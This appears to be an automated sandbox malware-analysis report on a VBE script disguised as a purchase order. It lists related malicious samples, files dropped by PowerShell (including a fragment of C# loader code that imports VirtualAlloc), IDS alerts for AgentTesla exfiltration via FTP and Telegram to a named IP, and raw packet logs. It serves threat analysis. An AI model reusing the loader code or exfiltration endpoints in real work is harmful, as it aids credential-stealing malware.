                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              54.91.59.1998dnOOS7Lby.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              OIVv97kaO5.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              library.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              XIiRHEaA9R.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              gf3YTNoH1Q.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              DHL Special Clearance Fees 01012022_sg.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              Documento contrattuale 22201008 Spec22201009.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              na.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              ConsoleApp8.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              if.bin.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              D1768Y2157.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              gSbSxwWtqG.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              gPZ7cR9v89.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              mixshop_20211229-065147.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              iff.bin.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              229C7DF4.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              0617_1876522156924.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              Whrw7Kmlni.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              gelfor.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              api.ipify.org.herokudns.comKWIR000714988.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Attach Qoute.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SWIFT Payment W076001.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              file.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 52.20.78.240
                              094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                              • 52.20.78.240
                              INV and NOA.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              ORDERFT-PO-0276-22 & PO pdf.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              SAP_RFQ-22-QAI-OPS-0067.Docx.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SecuriteInfo.com.Win32.PWSX-gen.543.5711.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              PO-IB5708.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                              • 54.91.59.199
                              VHE220012A.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              #U0e02#U0e2d#U0e43#U0e1a#U0e40#U0e2a#U0e19#U0e2d#U0e23#U0e32#U0e04#U0e32.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              swYA5v1F5o.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              DHLDOCUMENTS27011222.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              Y06bwSO4Jy.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              Halkbank.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SecuriteInfo.com.Win32.PWSX-gen.8427.25662.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              ftp.mcmprint.netOrdine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              Richiesta urgente.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              Payment advis pdf.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              ordine C220205 pdf.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              PO#0192 xls.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              ANGEBOTSANFRAGEN.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              SecuriteInfo.com.Trojan.NSIS.Agent.21226.9113.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              Jtkmmbl.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              DOC85945003805010 PDF.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              RFQ NO # 577131022.pif.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              PO-57064.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              INQUIRY- EUSQ131302.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              No context
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8003
                              Entropy (8bit):4.841989710132343
                              Encrypted:false
                              SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                              MD5:677C4E3A07935751EA3B092A5E23232F
                              SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                              SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                              SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                              Malicious:false
                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
                              Category:dropped
                              Size (bytes):1078
                              Entropy (8bit):4.940853242499253
                              Encrypted:false
                              SSDEEP:24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
                              MD5:D697E139982C89FE5B0FD2410BE24D8A
                              SHA1:A4436350800275EAB95B8C9FFF79C1A5AA3D5783
                              SHA-256:7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
                              SHA-512:8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
                              Malicious:false
                              Preview:.using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.211213369657342
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23ftVbBH0zxs7+AEszICN23ftVbDH:p37Lvkmb6KmDaWZE7DPH
                              MD5:4D7761BC538C78315CB0B7D49537A004
                              SHA1:8F0E7A3303C282F2B1859F63EB37BFE801B35B7C
                              SHA-256:8422ADE6961B4092DDA6D9EF5C6AC15F621CB0803D19AB8197A5DA777928FC18
                              SHA-512:DAB197A4D3289F2996403152E6D60658473BB3611F050851050381A26A77AB477B09C5AA99E2C4440ABA54EB015B16C758C5DA91A228B5BD12AFDD948955DC26
                              Malicious:true
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.052799017232693
                              Encrypted:false
                              SSDEEP:24:etGShEoL4q2fP+8cX7uAwOCTO7Ax+ilZZXaIXedLo1TtkF/K4NmWI+ycuZhN/nam:6hXpwPNYcYLIZT+1F/K61ul/na3Goq
                              MD5:140A93F45C268888BF601F03CA80BB29
                              SHA1:A52983EFA9A949F18AAECE009A03325E63C4430B
                              SHA-256:14B4DF06BE100518F7749895EE293E3E5BDD8156DF81166CAB0B9600743B565E
                              SHA-512:9D589B9F809D0F07530DA0B6F9EC1F4DBE55EF36F7E1CAFA33D949E70316245BC17EAEABCF7E564093F88A89BE00C4856A8D4F4F161C0C2654BCBBC202DB8C6F
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.303224718050824
                              Encrypted:false
                              SSDEEP:24:Aqd3ka6KmD7E7DPOKax5DqBVKVrdFAMBJTH:Aika6PnE7qK2DcVKdBJj
                              MD5:551FF17659DB1C1CA656A1F4C542C140
                              SHA1:1E5F30CB2A4C2E238AB6903A0EAB87219D3EE125
                              SHA-256:001FACBC1F52BE24790C07EB1AAFD087CBB9395871F486C1DDE62B22CF2C71D0
                              SHA-512:BA9EDEF5F25DF7066AC9CE71F7FC1910B5C02978708C72E9DCCDC82AC6C0E274D0CF5DA9B42E54D49593508FB5CC5F8FF856BEF7FB8E0BE1993EF259F41E38D0
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.087847912769416
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqgIYak7YnqqxgINPN5Dlq5J:+RI+ycuZhN/nakSGwPNnqX
                              MD5:34955465138EB2BC53DC0D26D39005E8
                              SHA1:200065A3FB120DB014BB5FBB910EAAF74060C879
                              SHA-256:CD95882F97D1A9AFF3A338D8AC93C25ABFB81237A4A0B316B3556908B9A58822
                              SHA-512:732124C01B2B5F3716020DAE3BFB814B9F0575AEDA82BED745AD9A18F57A9676846974938B35DB07A9EB6B8826A1D91E70AEEFEFCAE608B66D0F27CFD8F6B8FF
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 18:13:31 2022, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9874853720027996
                              Encrypted:false
                              SSDEEP:24:HMe9E2vpIlKcq9dHvAFwKPfwI+ycuZhN/nakSGwPNnqSqd:HO1q3xKPo1ul/na3GoqSK
                              MD5:3C6943A93469F3893ADFC0D016FE02A8
                              SHA1:74F78D59A92AE02CDED002086A1C361761C99C92
                              SHA-256:1823732D123E9C67B5733D7BB0FB0A20BF8636ED9F70A89D2DEEEBEABF468A38
                              SHA-512:6E614BB0D63C0FDBF8B837DCE5807FD1263753912535A4090A39AA427ACACA4FC180682DC572060A2B21ECC28B5250B6D81F3897C376816F98F118A938D06B06
                              Malicious:false
                              Preview:L...K..c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP...............4.Te....S..&.............5.......C:\Users\user\AppData\Local\Temp\RES6FA6.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):3.964735178725505
                              Encrypted:false
                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                              MD5:9F754B47B351EF0FC32527B541420595
                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                              Malicious:false
                              Preview:NordVPN directory not found!..
                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):5.855492842209971
                              TrID:
                                File name:PO-08784 xlsx.vbe
                                File size:352659
                                MD5:266115592f966240c14dfeeec624bdf5
                                SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
                                SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
                                SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
                                SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
                                TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
                                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                                Icon Hash:e8d69ece869a9ec4
                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                11/28/22-18:14:18.239839 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49807 | 21 | 192.168.11.20 | 185.31.121.136
                                11/28/22-18:14:18.274476 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49808 | 56411 | 192.168.11.20 | 185.31.121.136
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 28, 2022 18:14:03.603878021 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603878021 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603878021 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603929043 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603935957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603984118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604036093 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604037046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604037046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604089022 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604094982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604141951 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604195118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604202032 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604202032 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604247093 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604279995 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604279995 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604300022 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604403973 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604427099 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604427099 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604460001 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604487896 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604513884 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604568958 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604623079 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604624033 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604624987 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604682922 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604762077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604835987 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719151974 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719235897 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719434023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719434023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719494104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719600916 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719654083 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719707966 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719727039 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719808102 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719820976 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719877005 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719924927 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719929934 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719984055 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719991922 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720103979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720103979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720187902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720246077 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720264912 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720340967 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720376968 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720393896 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720438004 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720491886 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720545053 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720583916 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720628977 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720665932 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720722914 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720777035 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720829010 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720869064 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720869064 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720882893 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720927954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720937014 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720989943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721035957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721035957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721043110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721096992 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721149921 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721203089 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721199989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721199989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721256971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721260071 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721308947 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721362114 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721364975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721364975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721415043 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721424103 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721470118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721524000 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721575975 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721611023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721630096 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721683979 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721735954 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721751928 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721751928 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721791029 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721827984 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721828938 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721844912 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721898079 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721950054 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721961975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721961975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722002983 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722038031 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722038031 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722057104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722110987 CET8049803192.185.145.188192.168.11.20
